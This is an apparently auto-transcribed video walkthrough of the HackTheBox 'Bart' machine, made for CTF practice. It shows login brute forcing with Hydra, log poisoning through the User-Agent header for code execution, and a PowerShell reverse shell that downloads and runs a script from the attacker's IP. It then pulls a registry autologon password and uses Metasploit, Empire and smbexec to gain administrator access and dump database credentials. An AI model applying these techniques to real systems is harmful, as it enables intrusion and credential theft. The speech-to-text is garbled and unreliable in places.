HackTheBox - Bart

IppSec · Beginner ·🔐 Cybersecurity ·8y ago

Key Takeaways

The video demonstrates a cybersecurity challenge using tools like GoBuster, Hydra, Burp Suite, and Metasploit to exploit vulnerabilities in a Windows IIS server and gain administrative access.

Full Transcript

what's going on YouTube this is IPSec when we doing but from hack the box but first off if you're watching this on launch day I am currently on vacation and I will be next release as well so if I glance over any topics I normally wouldn't I'm just a little strapped for time and getting some videos in the backlog so I don't miss any weeks because you know how slow I am getting back up to schedule once I miss a week so anyways this box is really fun because there's just so much to do and some people complain because it seemed like there was a lot of brute-forcing like the very first user name is Harvey and if you look at the web page a lot of the credentials are like first initial last name so it's a little bit of a jump to figure out the usernames Harvey however there is a way to enumerate that using the forgot password link and it would tell you if we use names good or bad so there's kind of a two-fold brute-force process find a place to enumerate the user name then find a place to brute-force the password which is very realistic in my opinion you gotta do a bunch of web stuff once you do the web stuff you get on the box and you can probably have asked a lot of ways there's a lot of credentials hidden in the like my sequel databases and config files there's also a user that order logs into the box and you can pull that hash it's not hash pull the password of the user that order logs in and reuse that to get administrator a lot of people miss that because I think the web application is running as 32-bit so if you don't specify 64-bit payload because of Windows registry redirector I think you can't actually get to the registry key that has the hard-coded password so that is one of the big lessons to take away from this box is to check what type of environment you're on are you on a 32-bit environment on a 64-bit platform or use 64-bit environment on a 64-bit platform if that doesn't make sense it will soon so let's jump in to serve up or run a map - SC for default scripts SV enumerate version so a I'll put all formats but in the EM app directory and call these files Bart and then the IP address which is 1010 1081 does take some time so I've already ran it we can see only one port is open that is HTTP listening on port 80 that is microsoft iis httpd 10.0 so this is a Windows 10 or Windows 2016 host every curious can just Google like Windows is version 2 OS I think and then we'll see things like windows 7.0 is windows 2008 or 7 and 7 point 5 is 7 or 2008 to 8.0 is Windows 8 or 2012 and anything below 7 is bad because it's 2003 and there is no 9 because 7 ate 9 it goes straight to 10 and this page hasn't been updated but that is Windows 10 or 2016 so nothing too interesting there let us just go and poke around at that port 80 and to do so first we'll run go Buster's so we'll do go Buster go Buster - H and we'll use the flags let's see we want to do - w foo a list and a favorite wordless is user share we're list door buster directory list 2.3 medium now o the URL which is HTTP 10 10 10 81 then we got to specify the out file we'll just call this der bus dot - but htb and we get a 200 on a weird URL right off the bat and it says to force processing wildcards we can do - fw it says everything is active that's not it so let us remove that file because I don't know if it appends or creates a new one and let us just curl 10 10 10 81 do - 3 vs we get a 302 directing as to form Bert HT be let's curl this with something that doesn't exist and we get a 200 ok with a picture content image JPEG so let's just try going to 10 10 10 81 slash please subscribe because that probably doesn't exist and we just get the world's largest index of useless websites well looking for your page but can't find it is this just one image do they have a rotation no they do not so for this go bust I'm gonna do something a little bit different and we're going to do a let's see - s and that is right here and we're gonna do every string but 200 because - hundreds apparently are bad and when we just went to slash we got a 302 so this should still work and we know slash form is a good one to do so let us go to ten ten ten eighty one slash form and we get this page and if we just went to ten ten ten eighty one we get directed to forum VAR h TB and it goes to my verizon black hole which is a search so let us edit this to be editor host foul its host to say ten ten ten eighty one really resolves to forum VAR h TB and i'm also gonna put just bart h TB see if that changes anything and what that's doing on the back end we can poke in real quick and just go to ten ten ten eighty one it should be sent to my Burt proxy if I configured it we say ten ten ten eighty one go to burps and two repeater we can see that just going to slash gives us the redirection to forum bar h DB if we change the host header which is what your browser's doing whenever you go to a website it puts the domain name in this header and click go is sees that and directs it to the appropriate place so let us get rid of Boop go back to this and we still get a black hole and that's probably because of some weird caching things so I'm going to go into my privacy clear everything I think that's all I have to do and we go to that URL again still not that is weird so ten ten ten eighty one shift are that should have cleared it I always hate caching issues clear history clear everything do not track change preference that's fine that's fine advanced clear offline web data cached web content just trying to clear everything I possibly can close out these windows and we'll clear things again for good measure and after that we should go to 10 10 10 81 and it will take the information that isn't a host file if we are lucky there we go so cleared out the cache and now that DNS actually takes place in a Firefox and we go to this web page going down we see they don't really have much of a business thought out because it's just lorem ipsum information so in a CTF challenge this probably means I don't have to use cool or something against the web page and build a word list we see what else we provide they give free coffee so I guess they got that going for them going down we have a few people Samantha brown is the CE o Daniel Simmons is the head of sales Robert Hilton is a head of IT looking at the social media everything is just going to nothing except mail and we see usernames s brown d dot Simmons or dot Hilton's so we kind of get an idea of how user names work we got Jane Doe who's a client for fluffy unicorns latest news we got a new recruit daniela lamborghini so maybe try d lamborghini with like password1 if we get to a long and prompt keeps going we see powered by wordpress so i'm gonna do slash wp-admin and we can't get to a page so i'm gonna go back do control you to view the page source and search for like WP - content and it looks like they may have removed like the default wordpress links because WP content should be all over the place we should have Doug be content WP plugins WP - everything and we don't so glancing through the source to see if I see anything that really stands out don't see anything there going down don't see anything that's that lorem ipsum nothing and we get a big block of comments and this is her V Potter the developer at Bert so we got yet another user H dot Potter and I'm going to the bottom that's about it so what a dead end now but thankfully we always do recon in the background so let's go back to a go Buster and we see we got forum which that's what we're at and we also have slash monitor so let's go over to that URL we go to but dot h TB / monitor we get a server moderate page so this is PHP server mount of 3.2.1 let's go to the web page go to downloads and the latest version is three point two point zero so something may be modified because they're running a later version than what the website offers which is odd looking at the release date we see that was probably released April 15 2017 so we don't have much if we try to login with a name let's say H dot Potter the developer put a blank password time to log in the information is incorrect let's go to like forgot password and we'll try to brute-force user names so HD Potter what's this say the provided username cannot be found so we have a good prompt on validating user names we assume because if we find the user name it's gonna give us probably a green box and say hey your password reset has been set so let us try to find a way to brute-force this so I just said so a lot I normally don't do that or I don't think I'd do that but I'm gonna do intercept configure a browser to point to book and specify a username or anything that doesn't exist so we can say please subscribe to see what this request looks like going to Bert we have a cross-site request forgery token which probably updates every single time you do this which means well it's gonna be a bit of a pain to do this check if you want you can check my sense video because I do a brute force with CSRF there we're not gonna code the script do this we're just going to manually check a bunch of user names until we get a good result but if you wanted to check the sense video and look at the very end for how to code a cross-site request forgery brute force so in Python so let's see let's do a CH Potter again doesn't exist H Potter without the dot doesn't exist Potter does exist I'm doing the developer because chances are the CEO is not gonna have access to the server monitor nor is a nor new recruit or anyone else most likely it's gonna be a developer since we didn't see any sysadmin there and type in the name Harvey we get an email reset and this is a bit noisy but yeah it's one way to do it so we can try logging in as him so let's try Harvey password and again we'll intercept this with Burt to see if the CSRF token is set if it is we're not gonna try to brute-force it with a script just because it's a pain in the butt to code when doing a live video or just guess a password so that was password would do love sex God whatever the top passwords and eventually we land at his very last name which is Potter and it should let us login and we go to a DNS blackhole again and it can't find monitored Bert HDB so let us check that if that isn't set up you can always go to your burp history and look there what it tried to get so let us I guess we can kill that go bluster now the Etsy host we can edit this to be monitored Bart htb save that and when we go there it's probably not gonna Wed us because the caching issues let us close every tab go into a history and clear all the caches so clear that go to advanced clear cached web click it a few times click override click it again unclick override click off my web content and data because I don't know where it's stored and apparently clicking it a lot does help or it does not help maybe it is just time related and yeah well we can turn burp off maybe burp has it cached nope no we can restart Firefox I'm guessing it is time related or something whatever it is it is annoying and the real world dns does resolve me not to edit your host file so let's try this again mario htb go back there oh my god is annoying I may just create the rule in verb to rewrite it so we always go there there's no proxy we have cleared a recent history multiple times going to advanced we can clear both of these caches and then you're going to work now monitory HDB I'm gonna specify HTTP colon slash slash there we go we get a login prompt again we know the password this time it's Harvey Potter and because we cleared all this stuff we cleared the cookie so login here we can click around to see what we see we have another domain name under servers internal oh one bar htb so we probably should look at that but just being thorough clicking on all the tabs clicking on all the things don't really see other anything else other than intoned - oh one part h-2b so let us check that one so internal - oh one part htb and we can go there and we should not deal with the cache issue because we've never been there before but of course we have to turn on l1 h TB let's just ping this to make sure we can get there yes I set that correctly I hate caching I really do clear clear I may just open I like incognito window that should do it if this doesn't okay let's open up a new private window hopefully this window doesn't take any cashing thing from the previous so it did that could be a privacy concern there we go we can walk again so let's try Harvey and powder again password must be eight characters okay so let us try sending this one over to burp so intercept on turn this on we can do Harvey the fastball will do please subscribe click go and we don't have any CSRF tokens so we can send this over to repeater and we're going going to use hydra to brute-force this so we click go we should get we get a 302 found full of redirection it's like invalid password invalid username a password okay that is good so let's see hydra - h oh shoot grab HTTP - post - form of course doesn't exist let's go to burp disable intercept in Google had a Hydra HTTP so HTTP - Paris - form okay so let's copy this that should be all we need coming out and we'll type it so we want to do Hydra I like doing the username first the username will do is Harvey and if we wanted to for good measure we go back to the login form and see nope it says invalid username or password not just invalid password so we're not positive the user name is Harvey what we can guess it is and then we'll do - capital B so when you end hydrate - lower case means that user uppercase means go to a file so we'll do user share word list rocky text will do HTTP oh I think we specify the IP now so 10 10 10 81 HTTP - forum - post is the module we want to use and it's probably has to be internal - Oh wunderbar h-2b I'm not exactly sure how it's gonna handle host names I don't know if Hydra does that I think it does going to boot the place we want to send the request to want to do it back it's a post request to this then we do : and then the parameters which is you name passwd so your name is equal to carrot user carrot and Hydra is going to search and replace anything with carrot user carrot and replace it with the username and again with pass with the password and the pass is going to add right through that file so and passwd I think that's what it was yep is equal to pass and submit equals well again then we need another colon and the error message the webpage provides to go to the page it says invalid username and password I think hydro will follow a 302 redirect we will find out do that and hope you type everything correctly and this works and either Harvey is not the username where we lock the account out because a lot of things came back let's see I think I screwed up that Hydra so what we can do is point this at one 27001 which is going to be burped and we can say go to proxy options find the port 80 redirect to 10 10 10 81 on port 80 okay then we go to options we should have a rewrite option there we go and host we can edit this we'll do match host is equal to 127 0 0 1 which is probably what hydras going to put and replace it with internal 0 1 4 HDB check that so it is on tenderness I've gone for the first few requests click go it's doing get requests first there we go and we can see it going through various passwords and now it's just doing gets again I don't know why it's doing both maybe those are following the redirect so let's just try exactly what happens when we do Harvey and lovey maybe it's multiple passwords maybe there's some type of collision I don't think so but I don't know exactly what's going on right here no password must be eight characters or more that's why so yeah those are all not eight Jessica at code is probably seven yep so hi just stopping because we're not at eight characters or more so I wonder let's see the past one must be at least eight characters one of its case sensitive and we can just put password with spaces before it after maybe that will work so we're now just nope still network but we got a few that were longer than eight so what happened that one two three four five six seven eight nine with her IV Harvey well again still invalid so Hydra may not be the best application to do this with try password one still invalid using and password let's I guess try one last thing let's just do password without the spaces before and after and this one isn't returning as many false results so maybe it was the space before and after password that did not like I'm just really hoping in once you log in it doesn't have the password on the site because it will trigger a false positive so we'll let this one finish and see what happens and this one isn't returning as many false results but as you can see it's gonna take like I think 332 hours so that's not good especially because if the word password exists on the page once you log in hydras going to ignore it because that's what we told it as we said hey if you see password ignore it it's an invalid request so let's use a smaller word list so it actually finished and let's remove that Hydra not restore file so we don't have to worry about resuming let's see less users share were less Metasploit so only good with small word list and let's see I guess we can try common routes what's that look like less yeah this looks fine WC - L only 4700 lines if we look at RockYou it's gonna be big so users share were list Rock you and c3 314 million so this is a infinitely smaller than rockeo so let's try this with Hydra see if it gets anything so let's paste this in we don't need to go through burp anymore cuz we verified it's working so 10 10 10 81 click go and we'll see if this finishes does this tell us how long it's going to take cause we could always up the threads if we have to but I'm going to positive 8 this shouldn't take too long it'll probably tell us how long it takes and a minute or two but no need to make you wait around watching the CPUs turn we got a bunch of results and I think this one is actually my fault because as that was running I was thinking change this to the IP probably wasn't smart because hydras not going to know that's internal one port HDB because if we go to let's see 10 10 10 81 slash simple underscore chat we'll see if that page exists so this is what Hydra is going to be sending the request to login dot PHP and we just get a 404 page so of course hydras not going to find anything so changing it back to 127 zero zero one where we have the readwrite that is going to fix that issue so hopefully this time we don't get all those false positives brute-forcing HTTP sites for the first time I guess just doesn't go well at least I'm doing a very poor job of it today but as I always say I think I'm out of possible options to fail and there's only success left so let us hope that the word password just isn't on the page and this Hydra command isn't moot to begin with because again if once you log in the word password is anywhere it's going to fail and I don't know if this is case sensetive or not so hopefully this command works when I did this box whenever I did it months ago I had to use burp intruder but that's a paid like thing unless you want to use burp intruder for free which makes it go incredibly slow so I try to not do that and it looks like it'll take about seven more minutes left to finish so I'm gonna pause the video and hopefully we don't get a bunch of false positives Roger did come back pretty much this second I paused that video we see Hydra took about one minute and eight seconds or whatever 1814 under a minute and 30 seconds to complete or 90 seconds I can't talk but yeah we got her V and password one so we're gonna try that so Harvey password one with a capital P I think we tried it before with a lowercase B intercept is off clicking login and we go here and we have Bobby who was he on the website to begin with or is this a new person who is Bobby so control you Bob doesn't exist Rob Robert Hilton the head of IT so he goes by the name of Bobby apparently he's yelling at the dev Harvey to say stop putting development code on a production server so we could try doing things like cross site scripting test by putting HTML and C of this person and it looks like it does not looking at control u we can see let's see it's sending stuff to this file internal a one-bar HP slash log slash log dot PHP and if you didn't brute force to use name and go through all that trouble you can also found this through go busting and doing adder blast because if you do go Buster this will come back as a directory they can do it again defined log PHP then you use W fuzz like we did and nightmare at a bunch of other videos to brute force the extensions I don't even think you have to brute force the extension I think if you just go to log dot PHP it tells you because of a failure codes yeah it says undefined index file name and user name so if you just used go Buster to find that directory or that file you didn't have to brute-force the username and password but I digress let us go to exactly what he said which was here and let's close out some of these windows there we go and see what this is so we just get one which is a bit odd let's try like local file inclusions so if we do follow name is equal to let's do HTTP 1010 1430 I think is my IP slash test I only have to edit burp to turn a proxy off because I want to listen on port 80 so intercept options to the top stop wasting on 80 go here let us do Python mate directory dub-dub-dub and then we can do Python - M simple HTTP server on port 80 go back here and see if this hits failed to open stream HTTP wrapper does not support writable connections so we didn't make the request back to us so we can try our name is equal to log PHP let's make it execute itself and we don't really get anything let's see what else can we do slash log so if we do follow name is equal to slash log we get something and if we edit this request so let's go over to Firefox uh the proxy make sure intercept is on send this to it we see it's logging or user agent so what I want to do is put PHP code in my user agent to see if it executes so we'll do PHP system request please subscribe as the argument close that off semicolon there we go send that strip Peter because I want to do this multiple times potentially we send this nothing really happened so log dot php' what is here there we go so we want to include log dot php' I think it was a cash thing again on my browser that wasn't doing it but now we're getting multiple cannot execute blank command in this file so we have poisoned this log file and put code execution for a user agent so now all we have to do is well we can clean off a user agent I'll say thanks for subscribing because I know you can did and if you didn't it's because you already were but where do and please subscribe is equal to Who am I we hit enter we see everywhere it was giving that error message now says we are anti-authority slash user so we can do any command we want into this and we could also test it out and do this in a post request to see if that works I like post requests a lot because you can put more dangerous characters in them it doesn't look like we can do that so we can also see if Windows is is just going to pass that as opposed to PHP I don't know if that's actually the case does not so you have to put the command up here so let's use nishang to get a reverse shell so the first thing to do is go back to our Burt directory go into dub-dub-dub and when they copy /opt I think it's PowerShell nishang shells we wouldn't do invoke powershell DCP and PS one and we want to name this let's call it shell - 9001 dot ps1 editing this we know we want to use this command so we can just go to the bottom of this and we can do reverse IP address we'll do 10 10 10 10 10 14 30 which is our IP port 9000 one and we'll do over here NC l VMP 9001 we do that let's just clear that so it's a bit cleaner okay so we should be able to go to Bert IX new object net dot web client downloaded string HTTP 1010 1430 shell - 9001 dot ps1 close that out and we also have to do PowerShell let's see PowerShell double click there that looks good I like this press ctrl you - URL encode it click go we don't get a response back immediately that is good because boom we got a shell so we can do things like task list to view processes and see what is running on this box we could also like run powerup or jaws or other things enumeration scripts I'm gonna run jaws which is I think just another windows and numeration script so up PowerShell we could do Sherlock as well Jaws jaws II new copy that there and let's see example we just execute this it will help it to screen is there a command else let's try it ix new object net dot web client downloaded string jaws in HTTP 10 10 14 30 jaws II numbe s 1 we got the file successfully it's taking a little while to run which is a good sign and got an error message because cannot open service Control Manager on dot it might require other privileges and then the script dies so I don't think that actually finished let us try power up so CP power shell power sploit slash I think it's pretty foul exploit pretty vast power up ps1 there it is power up ps1 we can run this so IX new object net dot web client download string HTTP 1010 1430 power off ps1 looks good got the file successfully and then we can just do invoke - all checks and we get another error message and when I get a lot of these error messages and before we do that let's just go into one thing we could run individual things out of powerup so let's see them @h at the end so ah let's just grab function out of this to see all the things it does yep - I function how to power up so got a bunch of things so we can get like the function get cached GPP password and if we since we've already IX that we can just run that function and we get path is denied because again we're not admin or don't have permission to go where it is and we could try something like get registry order login and if we try this we get a weird error message and the error message is property auto admin log and does not exist in path which is odd because this registry key should exist and exact can't remember exactly the reason why it doesn't the name I think it's the registry redirector Windows sis 64 it's some of the magic about like 32-bit applications running on 64-bit and the H key local machine registry hive mmm there's really two of them one for 32-bit one for 64-bit and that registry audit logon does exist on a 32-bit and that's where a lot of these error messages are coming from so if we did something like environment is 64-bit operating system we get true and we can do environment is 64-bit process to see if our process is a 64-bit process and we get false so that's not good and that's where some of our error messages are coming from if we went into dir sequel in Windows you have a few directories I can't remember off top my head but sis native which I don't even see here this native you exist you're alphabetical maybe it's this native is invisible to 32-bit so I'm guessing system 32 is 32-bit applications since Wow 64 is 64-bit applications that are available to the 32-bit through some weird emulation cisnet 'iv you can't even see right now but that does exist on 64-bit machines and that is where the 64-bit processes live so let us exit out of this shell listen on 9001 again going to boot and instead of saying PowerShell let's do C colon backslash Windows backslash I think Windows PowerShell oh no we gotta do this native and I think Windows PowerShell then I think V 1.0 I should have left the show up to query this directory click go we don't get response back so that was the path that is the path to PowerShell I probably should have put dot exe there but if we look at this again now we have if we do environment is 64 bit process now it's true if we do dir SC : Windows CE desist native exists maybe it doesn't maybe I'm making this all up we clearly went to it this what I'm a little confused so this is something if you're curious do some more researching on I assume since native would have shown up right here it's alphabetical so it should be like right here and it's not but if we see D C colon backslash Windows backslash this native CD backslash CD windows sis native doesn't exist okay maybe it only exists when you're calling programs or something the demo gods have cursed me my understanding of that has just been completely blown exactly how that works but anyways it works so don't question it we're now a 64-bit process so let's just move on and do what we wanted to do so IX new object net dot web client dot download string HTTP 1010 1430 why burp just intercept something it took my focus away power of ps1 there we go see invoke or check see if this completes now probably won't still an error message we could also do Who am I slash all I think and we see the SC impersonation privilege is enabled so we could probably run potato this machine but I don't want a rotten potato it I want to do something else I want to do this without rotten potato well let's see if we did went back to these functions we tried the get registry auto log-in before but this time when we run it that registry key exists and it works and then it doesn't exist what did that happen before let's search my history question mark or just search for the command so that's the last time I ran it and no it immediately aired so yeah we're in a sixth appointment process it is still behaving weirdly but we got the administrative password as three one three zero four and this looks like a hash and I bet it's 32 characters because mr. hash is a troll mr. hash is the creator to the Machine yeah that's not actually a md5sum because the registry password for order login isn't encrypted but we could go to hashes org and check see if that exists search if this doesn't exist chances are that that isn't the intended thing at least for md5 because this has cracked a lot of md5 s and I hate CAPTCHA apparently I'm not human according to CAPTCHAs cuz I always fill these UTA tes okay yeah doesn't exist but that's the actual password to the machine so if we did like a run as we could actually run this as administrator so that's what we're going to do next so let's them a CP e shell 9001 to shell nine thousand two and we got to edit this and we're going to probably have to get hub pull another thing let's see do I have it PowerShell suite I think yep this is what I want so this is by beef or fuzzy security I think let's see PowerShell suite I mistyped that but Google knows one one fuzzy security and this guy also has a page on if you're interested in doing anyway really low-level stuff he's got a lot of good videos that I've been subdue him for a while it's I think I don't know what I pay a month but it's a patreon I'd highly recommend supporting him because he puts out really good content and you also get invited to a private slack if you want his patreon I think if you just Google like fuzzy security patreon there it is and then you got a link here become a patron so definitely recommend is that dead click that that button doesn't work but if you click the patreon page up there networks after one now highly recommend this good videos you have to pay to get archived videos but again they're worth it and if you want to know what the videos about before you pay just shoot me a tweet and I can tell you if I'd recommend or not answer is 99% of the time I'm gonna say yes go for it but enough advertising for him let's get back to this machine we want to do invoke run as and we can't just do run as because like and unlike Linux where we can get a fake PTY by just doing Python we can't really do that in Windows so the run as requires a PTY to do the entering of the password we can't just echo it in easily and yeah this invoke run as does a bunch of magic to give us that feature so what we're going to do is copy invoke run as two CD htb boxes fart dub dub dub CP up powershell power shell sweet and vocal run as to run as admin ps1 and we're just gonna put at the bottom of this and the reason why is this commands gonna get very long and I think we got some weird max length character on nishang so this had me fooled for quite a while if we do Python - see print a times will do 154 let's get 154 A's and if this doesn't work or this works I'm going to be sad so want to say right host paste all those A's it didn't fail before it was failing right host let's do the right host is it feeling silently nope okay so we won't do that we'll just try this right away but if we have errors then we'll paste the command at the bottom the script and see if it works I hate doing videos sometimes especially when things don't really go my way so we can just ix new object net dot web client downloads string HTTP 10 10 10 10 10 14 30 run as admin ps1 I don't have my web server running let's see copy and we probably should grab that admin password put that down there so we always have it available to a clipboard and we can do like invoke run as and we can see his usage so we got specify the username - user and its administrator - password we want to do that - domain we'll leave that blank logon type let's to 0 X 1 I don't know the exact difference between login with profile and net credentials only but we'll try profile first if that fails will fall back to net credentials the binary the full path and module so we'll do - binary C colon backslash Windows backslash this native backslash Windows PowerShell backslash B 1.0 backslash PowerShell Exe and then - args we want to do high X new object net dot web client we can do this so it's a bit easier to see I should put that in quotes new object net dot web client download string HTTP 10 10 10 10 10 14 30 /l - 9000 - ps1 and we get a weird error message so and I think this is coming from a script and we just get something odd so what I'm going to do is we're just going to paste this in the invoke run as command so in there paste that down and screw this up and Cl vnp 9000 to make sure that's listening on this again it still errors out so it wasn't because we weren't listening but let's see and vogue run as - user administrator password looks good save that IX new object net web client download string HTTP 1010 1430 / run as admin ps1 we're not doing the shell because that's in this script so just like we modified everything else we put the invoke command right below the function and if this works this is exactly why I do that little thing because you run into weird issues where things just fail because of weird characters string lengths etc and this is just more reliable so I think I typed that correctly and cannot add type compliation errors get us or this would have worked i tested on a Windows machine didn't test it on this actual box windows let's try system 32 and we'll paste this don't let string run as admin and the error message is coming from I think invoke going to Shang script which is weird let's exit out redo it get a new shell have two slashes there I had it at something I guess because it's not returning a shell see : windows it's native there we go got the shell IX errors out let's see so it looks like doing this lateral movement may not work that is unfortunate and it could be some type of oh wait nope no one I saw shell 9001 and thought it got it but something is not right here and I'm not sure exactly what PowerShell cannot add tight you know what we don't have to do this from within the Shang you could just do this from within Bert within here so let's send this repeated quest to another repeater tab we'll call this one get shell and this will be get admin so we're doing the powershell call here IEX download string instead of shell 9001 will do was it run as admin dot ps1 i maybe that will work maybe it's we eliminate in the Shang got run as admin and something went wrong so that error message definitely comes from this script so invoke - user - password - login type let's do C : Windows sis native Windows PowerShell the 1.0 click go still something went wrong me it's because we don't have like an interactive process maybe it needs interactive I want to think so - arguments ie X new object downloads string C let's do - uggs as Who am I make it's simpler instead of being complex something went wrong let's do C : windows system32 cmd.exe no I think I know what I need to do this should work nope let's see let's go back to powershell and we can try like - command does that work still something went wrong and we get no error message let's see - command eggs is it / k Who am I see : windows system32 cmd.exe and this is something that's super simple if you use Empire or Metasploit because you can just spawn as this is actually a relatively complex task as it turns out so we have run as user password binary log and tight and let's see don't specify arguments click go still in airmass and let's just say login type is the net login instead of logging with profile and still something wrong so we're having issues technical difficulties if you may so when that happens we pivot and switch to using let's say empire so up empire dot slash Empire let's see let's do we should reset the database CD set up doc / reset I'm negotiation password and we shouldn't have any whispers of agents running now good listeners use HTTP use listener HTTP help listeners let's see show info show help I know them in the listener tab I can do use listener some reason I always get that mixed up so once you do listeners and get into this tab you can do use listener HTTP and show info I think help info no show command and we can set the host to be 10 10 14 30 / we want to slash will do port will do 443 and we can set bind port to be 4 4 3 oh it's just port stop bind and Phil so a host is now 1010 1434 for three airports now four for three and we can execute so we start in the listener HTTP we can do launched a PowerShell and if we copy this into a file and I X the file we should get an empire listener M Empire dot ps1 okay and we can go back to a burp sequence this native powershell IX download string 10:00 10:30 Empire ps1 go we got the agent is now active we can go back twice and then interact with the agent we can search module power up use module and we don't need the powershell because their agents powershell so it knows that info and we can just execute because it doesn't look there's any options and we've tasked it to run so this will take probably 15-20 seconds to run if you don't see the results I'd recommend going back and then going back into it but this powerup actually finishes it didn't air it like in the Shang so it was definitely something odd with the Shan going on but we got the password for administrator and default password and let's see does it automatically add it it does not so if we wanted to we could do creds I think ad and then we could do domain this will be but no this is local default domain name is this then user name administrator and the password was this and this is just so if you wanted to stay organized you could do that and then whenever you type creds it has this and oh that's funny it's another troll it detected it as hash not plaintext because the past so it looks like a hash but if the password didn't look like that whenever you're in a Empire module you want to do like lateral movement you don't have to type username password etc you can just type cred ID 1 and then it already feels that but doesn't appear to be case this time because of trolls search module spawn as that's what we want so we want to use module management spawn as info set username administrator set password to this and we gotta set the listener and HTTP is the listener we use if we execute this module is not object safe this doesn't do it the same way beef does it and just drops a dot bat file because of some argument length of how reverse shell was doing it but yeah so we started it it's got a valid result and we should get a call back any second hopefully unless it thought that password was a hash and failed which is totally possible see password should work we can always set the domain to be what it said set domain execute yes volley results back back agents and we still don't have it this is weird this is game to be really odd maybe it's just easier to run potato this machine then do a frickin run as I can't believe how much trouble I'm having to do this simple task let's see let us switch over to Metasploit and do this so msf console and this one this should definitely work if not Metasploit has better port forwarding options so we can just poke around the firewall and do this let's start first grass first grass you well start and then go into Metasploit I really don't know why I didn't call I didn't give us a call back that way so let's see search for SMB I want to SMB delivery ok we'll use this module use module use show options set file name to redic dot DOL cuz this is getting ridiculous set share to please save me set sov host to be 10 10 14 30 set payload to be Windows x64 backslash interpreter reverse TCP set L host to be tun 0 do it twice for good measure set L port to be nine thousand three we show options this looks good exploit - J run this command on the target machine run DLL 32 10 10 10 14 30 so let's run that command we get a session so sessions - I 1 info help let's see is it sinful I'm sure with 64 bit back background section if we did search auto-login we could gather credentials this way and Metasploit so we could use that show options set session to one run and we get the password let's see that's the same one as this three one three zero three one three zero a DD DB yep that is all correct I think Metasploit has a creds thing and that is a lot random stuff I have not cleared that creds in a while let's see let's run that module again so I had the password backup okay back search module to be what I want spawn as is it search spawn as search spawn there is a way to do switching users and Metasploit so let's see there's a lot of payloads I think it's not spawn I think it's run as a metalloid there we go use module use post windows manage before you do that let's run this one more time grab the password and then we can use post windows manage run as show options set CMD is equal to shoot go back here grab this since that's the command we use to get Metasploit I wish I had a way to just like have a set payload option stupid backslashes so options looks good set domain dot set password I got off my clipboard already pasted show options it's good run it what-o set password that run command runs well you don't get a shell well I don't we get a shell I wonder there's something weird with like I use a permissions we're at that all this stuff is failing set CMD paying ten ten fourteen thirty show options and that one should definitely definitely work just use a new tab I guess T speed dump - I ton zero ICMP run okay and we don't get any TCP connections ICMP connections this is the video from Hell so let's see shell sessions - I one shell netstat dash again listening on port 445 okay exit pull it forward I think we want ad C so - H there we go so let's see we want to listen on four four five connect to 4 for 5 on host one 27001 we have to say add ah shoot Metasploit it's running on that back control-z I guess before ground that let's see jobs kill zero Sasson just one foot forward ad may we go now we can listen on for four or five so if I did NC localhost for four or five should get connect to but should so impac it - lets see maybe it's W my exact I thought that's it there was a PS exact I don't think W my exec uses this port let's see I wonder if there's a Metasploit option to do it search see SMB shares a search PS exact there we go use exploit windows SMB yes Zek so options set our host one 27001 set SMB user administrator so this is now smv pass show options set hey see payload last night where I want x64 eMeter for the first TCP set hell host done 0 set hold for five thousand for one authenticating selecting PowerShell target exiting payload and finally we should get a call back and get this shell let's see thanks boy created but no session was created this is getting rather tiresome SMB exact up PI there we go let's see - try to get IP 1 27001 well we just do one 27001 ok this is in packets so let's see where's user so your target domain / username password at okay so administrator password at localhost see assassin be exact works there we go this long long process to get admin to finally find a way to get it to work is done so huzzah can't see the under executive or paths dir C : users dir SC : users backslash administrator desktop and you can get route text that way using the type command so I hope you guys enjoyed all that um I guess we can play around with the system a little more to make this video even longer so let's get out of s and be exact one other thing I wouldn't normally do let's say we couldn't find the crab was gonna say that Windows order login password my next step would have been to enumerate things like MySQL so if we do shell sessions - I won and dropped into a shell we could go to CD let's go to the root go to i net pub Gaea CD dub-dub-dub root there we go pillage things like forum I look around in forum see what web dot configures that was like an eye is thing see what web st is it's like JavaScript stuff I don't think the forum is too interesting so let's move on to monitor we got config dot PHP so we got some credentials here so let's just exit Empire and we can exit this shell HDB boxes but the creds so we got the database as sis Mon and that's Daniel and string is creepy or sterling is creeping creepy okay so there's one password let's go check internal one there's a probably Harvey Potter let's see simple chat toy let's see it's probably an includes and there's a file called DB connect let's check that yep Harvey and I thought Harvey because when you logged in it said something stop using a deploying development code on production servers so this one is database let's see localhost user password maybe internal chat Harvey and I can be the best so we got to my sequel credentials data so let's exist do that port forward command again except Q's 3306 and we still want to do the same thing so we got that port relayed so we go back to this window we can now do my sequel - you let's grab Daniel's password Daniel - P I think it's capital P and we'll just prompt us for the password - H localhost it's lowercase B and a password huh that's odd I don't know why it's trying to connect through like a socket like this one we're sending it a network address so let's try one 27001 it's taking longer that's a good sign come on connect di n IE l da n IE l databases system on mysql - d system on su Daniel P - H capital D internal server error that's odd and C localhost 3306 there's something odd that should say like my sequel see oh crap I'm an idiot three three zero six blind failed port forward help let's see I afforded three three zero six two four four five and was trying to tell my sequel to connected to the box over SMB there we go so NC localhost now we get that my sequel string so we should it'll paste okay one 27001 paste the password and will logged in let's see so databases so we've got to day basis we got form in system on so we can use form show tables select star from underscore users so we got user login user pass and let's see that's all we need so we can select user login user pass from uh what was it underscore users and we just got one user here so take him and that is the CEO if I remember correctly so this was in form database let's see show databases use sis Mon show tables select star from users and we got a few so we can do select use your name password okay base these this is the SIS Mon database this can be that okay and then we got one more database the internal chat and that uses Harvey's credentials so let's see there's also the information schema let's see use information schema show tables actually not sure how this one stores passwords so users table easily viewable user privileges global key column schema privileges see it's a quick google extract credentials information schema let's see that's not it I'm not sure where the user credentials are stored I'm sure there's a Metasploit module to do it database credentials master assists that is weird this my sequel that doesn't really sequel let's just go back and do what we'll call them Harvey my sequel - Neil Harvey cases password show databases and he's got internal chat show tables select star from user and we got three users now whoops too much okay I didn't put a separator there okay so that's all good if you wanted to crack these two it's relatively simple just Google like hash cat example hashes go to the wiki page they can search let's say - why is YB PHP - why what is it fashion that's WordPress I think too white n let's see T be accelerated there should be a hash code identifier for this let's see is this bcrypt probably be equipped let's search for peak it looks like yep so to stir dollar then stuff so that apply B - mm 3200 then you got this that's a PHP hash so you can easily crack that with - m400 but this one is a little bit different we don't know what this is so let us echo - N and count the characters 64 and 64 characters is normally a sha-256 um so if we echo test sha-256 some we get 64 characters 256 some okay I should have not summed it WC - see yep so what we do is sessions - I won oh that's it she'll go back and to the code and let's look for where it registers users so simple chat and let's see chat dot PHP no register dot PHP and let's look in includes validation function markup so let's type register dot PHP and see how it registers users so let's search for like siya that's too much validate password so we'll here we go using the argument passed WD for password and we got to find this validate underscore passwords field so we could grep it if we have this on Linux but I saw a file called validation funks so 